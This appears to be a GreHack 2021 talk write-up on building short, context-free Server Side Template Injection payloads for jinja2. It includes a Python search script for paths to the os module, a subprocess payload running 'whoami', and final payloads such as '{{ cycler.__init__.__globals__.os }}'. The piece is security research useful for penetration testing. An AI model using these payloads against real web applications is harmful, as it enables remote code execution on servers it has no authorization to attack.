GreHack 2021 - Optimizing Server Side Template Injections payloads for jinja2
Introduction
When attacking Python-based web applications, we often need to find a way to execute commands on the server and escape from the application context. In order to get access to the underlying Python backend of a web application, an attacker can exploit common vulnerabilities such as
Server Side Template Injection (SSTI)
or Code Injections (CI) but how can we escape from this context? In this paper, I present a general approach to solve this problem by exploring python modules and python objects to find paths to high value targets, such as the
os
module or built-in functions. I will then use this technique to create the shortest payloads to access the
os
module in Python’s jinja2 template engine.
- Recorded talk (MP4) : GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2.mp4
- Paper (PDF) : GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2 paper.pdf
- Slides (PDF) : GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2 slides.pdf
- Live talk on YouTube : https://www.youtube.com/watch?v=2dS34u3T-80&t=25425s
Server Side Template Injections
Server Side Template Injections (SSTI) vulnerabilities can happen when an attacker can modify the template code before it being rendered by the template engine. This can happen in a lot of ways, by mixing format strings and templates, by obtaining a write access to the template files, by a file upload vulnerability …
When an attacker finds a Server Side Template Injection, he will try to inject template code to exploit the template engine to gain access to the underlying machine and achieve Remote Code Execution (RCE).
Finding a path between two modules
Firstly, let’s see what a path from a module to another looks like. With a little bit of research, code review and testing, we can find a path to the
os
module from the
jinja2
module by hand. This is really long as we often need to read the source code of the module to move forward. We can test this path and see that we can access the module
os
from the module
jinja2
:
>>> import jinja2
>>> jinja2.bccache.tempfile._os
<module 'os' from '/usr/lib/python3.8/os.py'>
>>>
Python internals
In Python, most variables are actually objects. Python classes’ and objects’ have very interesting internal functions, whose names starts with two underscores
__
. Some of these internal functions are called when the object is converted to a type (
'__bool__', '__float__', '__repr__', '__dict__' ...
) and some of them are used in comparisons (
'__eq__', '__ge__', '__gt__', '__le__', '__lt__','__ne__', '__neg__', ...
). We can list all of the attributes (functions, internal functions, variables) of a Python object through the
dir()
function. Here is an example of the attributes of an
int
object:
>>> dir(int(0))
['__abs__', '__add__', '__and__', '__bool__', '__ceil__', '__class__', '__delattr__', '__dir__', '__divmod__', '__doc__', '__eq__', '__float__', '__floor__', '__floordiv__', '__format__', '__ge__', '__getattribute__', '__getnewargs__', '__gt__', '__hash__', '__index__', '__init__', '__init_subclass__', '__int__', '__invert__', '__le__', '__lshift__', '__lt__', '__mod__', '__mul__', '__ne__', '__neg__', '__new__', '__or__', '__pos__', '__pow__', '__radd__', '__rand__', '__rdivmod__', '__reduce__', '__reduce_ex__', '__repr__', '__rfloordiv__', '__rlshift__', '__rmod__', '__rmul__', '__ror__', '__round__', '__rpow__', '__rrshift__', '__rshift__', '__rsub__', '__rtruediv__', '__rxor__', '__setattr__', '__sizeof__', '__str__', '__sub__', '__subclasshook__', '__truediv__', '__trunc__', '__xor__', 'as_integer_ratio', 'bit_length', 'conjugate', 'denominator', 'from_bytes', 'imag', 'numerator', 'real', 'to_bytes']
>>>
As we can see, there are many attributes to this object, most of them being internal functions. These functions are called when casting objects, for example calling
str(int(17))
would call the internal
__repr__
function like this:
int(17).__repr__()
.
>>> str(int(17))
'17'
>>> int(17).__repr__()
'17'
>>>
From these functions and attributes, we can access other attributes, such as other functions, variables or sub-modules. Here is an example of sub-attributes found in the previous
int(0)
object:
>>> dir(int(0).__init__)
['__call__', '__class__', '__delattr__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__name__', '__ne__', '__new__', '__objclass__', '__qualname__', '__reduce__', '__reduce_ex__', '__repr__', '__self__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__text_signature__']
All of these functions can be chained to access one object from another. This is the core concept that most payloads use in Server Side Template Injections (SSTI) exploits today , like this one:
{{ ''.__class__.mro()[1].__subclasses__()[396]('whoami', shell=True, stdout=-1).communicate()[0].strip() }}
This type of payloads can cause various problems because it is
highly context dependent
. Indeed the values of the indexes in
"...__class__.mro()[1].__subclasses__()[396]..."
can vary depending on the version of
jinja2
and the modules used inside the application.
We can find one path from the module
jinja2
to the module
os
by hand, but we simply cannot test every possible path by hand. So, what is next ?
Breadth first search in Python objects
In order to create a general algorithm to explore python objects and extract high value targets for exploits, we first need to define what high value targets we want to find. We will consider modules and built-in functions as priority targets, as they would constitute the basis for a successful exploitation. These two elements are represented as strings by the
__repr__
function as follows:
-
Modules
: Represented by strings like
<module 'os' from '/usr/lib/python3.8/os.py'> -
built-in functions
: Represented by strings like
<built-in function open>
The first approach to this problem would be to write a recursive function performing a breadth-first search limited to a maximum depth. This function will retrieve all the sub-attributes of an object, and recursively explore them as well.
def find_path_to_modules(obj, found={}, path=[], depth=0, maxdepth=3):
if "modules" not in found.keys():
found["modules"] = {}
if depth < maxdepth:
for subkey in dir(obj):
try:
try:
subobj = eval("obj.%s" % subkey, {'obj':obj})
except SyntaxError as e:
continue
if str(subobj).startswith("<module '"):
modulename = str(subobj).split("<module '")[1].split("'")[0]
print("\r[>] Found module '%s' at %s" % (modulename, '.'.join(path+[subkey])))
if modulename not in found["modules"].keys():
found["modules"][modulename] = []
found["modules"][modulename].append(found["modules"][modulename] + ['.'.join(path+[subkey])])
# Explore further
foundmodules = find_path_to_modules(subobj, found=found, path=path+[subkey], depth=(depth+1), maxdepth=maxdepth)
except AttributeError as e:
pass
return found
With this first approach to the problem, we have two issues:
-
Cyclic traps : When exploring a sub attribute of an object referring to itself or one of its parents, we will fall in an infinite loop.
-
Long exploration time : During the breadth-first search, we will encounter a lot of objects, and many of them more than once. This will result in a massive loss of time while exploring multiple times the same objects.
Preventing cyclic traps and optimization
In order to prevent
cyclic traps
, we need to keep track of the objects we already explored. To do this, we will create a list containing the
id
of each explored object. The
id
function returns the address of the object in memory (in CPython implementations), this ensures that the objects are different if their
id()
differs.
General algorithm to find modules from a Python object
The general algorithm we will use is a recursive function performing a breadth-first search limited to a maximum depth. This function will retrieve all the sub-attributes of an object, and recursively explore them as well. At each step, it will store the
id()
of the object to prevent falling into cyclic traps.
def find_path_to_modules(obj, found={}, path=[], knownids=[], depth=0, maxdepth=3, verbose=False):
if "modules" not in found.keys(): found["modules"] = {}
if depth < maxdepth:
for subkey in dir(obj):
if verbose == True:
print("\r\x1b[2K%s" % '.'.join(path+[subkey]), end="")
if type(subkey) in [bool]:
continue
try:
try:
subobj = eval("obj.%s" % subkey, {'obj':obj})
except SyntaxError as e:
continue
if str(subobj).startswith("<module '"):
modulename = str(subobj).split("<module '")[1].split("'")[0]
print("\r[>] Found module '%s' at %s" % (modulename, '.'.join(path+[subkey])))
if modulename not in found["modules"].keys():
found["modules"][modulename] = []
found["modules"][modulename] = shorten_module_paths(
path[0],
modulename,
found["modules"][modulename] + ['.'.join(path+[subkey])]
)
# Explore further
if id(subobj) not in knownids:
knownids.append(id(subobj))
foundmodules = find_path_to_modules(
subobj,
found=found,
path=path+[subkey],
depth=(depth+1),
maxdepth=maxdepth,
verbose=verbose
)
except AttributeError as e:
pass
return found
Constructing payloads for jinja2
The
TemplateReference
object in jinja2
In jinja2 templates, we can use the
TemplateReference
object to reuse code blocks from the template. For example, to avoid rewriting the title everywhere in the template, we can define the title in a
{% block title %}
block and retrieve it with
{{ self.title() }}
later:
>>> msg = jinja2.Template("""
... <title>{% block title %}This is a title{% endblock %}</title>
... <h1>{{ self.title() }}</h1>
... """).render()
>>> print(msg)
<title>This is a title</title>
<h1>This is a title</h1>
>>>
The access to the
TemplateReference
object is context-free and it comes with no requirements except being in a jinja2 Template. This is exactly where we would be able to inject code if we managed to get a
Server Side Template Injection (SSTI)
on a web application. We can directly have access to the
TemplateReference
object through a simple
{{ self }}
in a template:
>>> jinja2.Template("My name is {{ self }}").render()
'My name is <TemplateReference None>'
>>>
TemplateReference
object to
os
module
Using the general algorithm described above on
jinja2
as the starting point for the search, we get very interesting results for all the paths to the
os
module:
{
"modules": {
...
"os": [
"jinja2.utils.os",
"jinja2.bccache.tempfile._os",
"jinja2.bccache.tempfile._shutil.os",
"jinja2.bccache.fnmatch.os",
"jinja2.loaders.os",
"jinja2.environment.os",
"jinja2.filters.random._os",
"jinja2.bccache.os"
]
}
...
}
This is all the paths we can reach the
os
module from the
jinja2
module. Now, we will look at the
TemplateReference
object to see what variables we can use. We can see there is a variable that stands out, the
_TemplateReference__context}
:
>>> import jinja2
>>> jinja2.Template("My name is {{ f(self) }}").render(f=dir)
"My name is ['_TemplateReference__context', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getitem__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__']"
Now, if we print this object, we get a dictionary with many values:
>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context }}").render(f=dir)
"My name is <Context {'range': <class 'range'>, 'dict': <class 'dict'>, 'lipsum': <function generate_lorem_ipsum at 0x7f9a1cb0a0d0>, 'cycler': <class 'jinja2.utils.Cycler'>, 'joiner': <class 'jinja2.utils.Joiner'>, 'namespace': <class 'jinja2.utils.Namespace'>, 'f': <built-in function dir>} of None>"
This
{{ self._TemplateReference__context }}
is very interesting because it gives us access to the following classes:
-
jinja2.utils.Cycler -
jinja2.utils.Joiner -
jinja2.utils.Namespace
As we have seen before, we can access the
os
module from
jinja2
at the path
jinja2.utils.os
. Therefore, all we need to access
os
from the
TemplateReference
object is to access the global variables of one of the classes Cycler, Joiner, Namespace.
To do this, it’s really simple ! We first need to access the class constructor:
>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__ }}").render()
'My name is <function Cycler.__init__ at 0x7f696dd06700>'
Then access the class constructor global variables (corresponding to the global variables declared in
utils.py
inside jinja2):
>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__.__globals__ }}").render()
'My name is {\'__name__\': \'jinja2.utils\', \'__doc__\': None, \'__package__\': \'jinja2\', ... ... \'os\': <module \'os\' from \'/usr/lib/python3.8/os.py\'>, ... ..., \'Cycler\': <class \'jinja2.utils.Cycler\'>, \'Joiner\': <class \'jinja2.utils.Joiner\'>, \'Namespace\': <class \'jinja2.utils.Namespace\'>, \'_\': <function _ at 0x7f696dd06670>, \'have_async_gen\': True, \'soft_unicode\': <function soft_unicode at 0x7f696dd06ca0>}'
And finally, we can access the
os
module !
>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__.__globals__.os }}").render()
Context-free payload for Remote Code Execution in jinja2
We now have three context-free payloads that can be used to access the
os
module from the
jinja2
module.
{{ self._TemplateReference__context.cycler.__init__.__globals__.os }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os }}
Let’s render a small template to check if it works:
>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__.__globals__.os }}").render()
"My name is <module 'os' from '/usr/lib/python3.8/os.py'>
These payloads gives us a new, quicker way to access to the
os
module in Server Side Template Injection attacks. This will be really useful in bug bounties and penetration tests !
Further optimization
Now that we have completely context-free payloads, we can add a final optimization to them. To construct these payloads, we explored the python object tree from the
TemplateReference
object declared within jinja2 templates as
{{ self }}
. This object holds all the variables declared inside the template, therefore we could simplify our payloads by removing the
self._TemplateReference__context
as we can access directly to
joiner
,
cycler
or
namespace
from within the template!
Therefore the final context-free payloads to access the
os
module in jinja2 templates are:
{{ cycler.__init__.__globals__.os }}
{{ joiner.__init__.__globals__.os }}
{{ namespace.__init__.__globals__.os }}
Conclusion
In
Server Side Template Injection (SSTI)
vulnerabilities, we can inject template code in the web application, which will then be reflected in the template and executed inside the application context. In order to escape this context and gain Remote Code Execution on the server, we often need to find a way to import the
os
Python module.
In order to find generic ways to access the
os
module, we studied how Python objects and internal functions work in order to design an algorithm capable of exploring Python objects looking for modules, without falling into cyclic traps. With this general algorithm, we were able to
construct context-free payloads
that can be used to achieve Remote Code Execution (RCE) when an attacker has a SSTI in jinja2. Other payloads can also be created to exploit other template engines,
such as Mako for example
.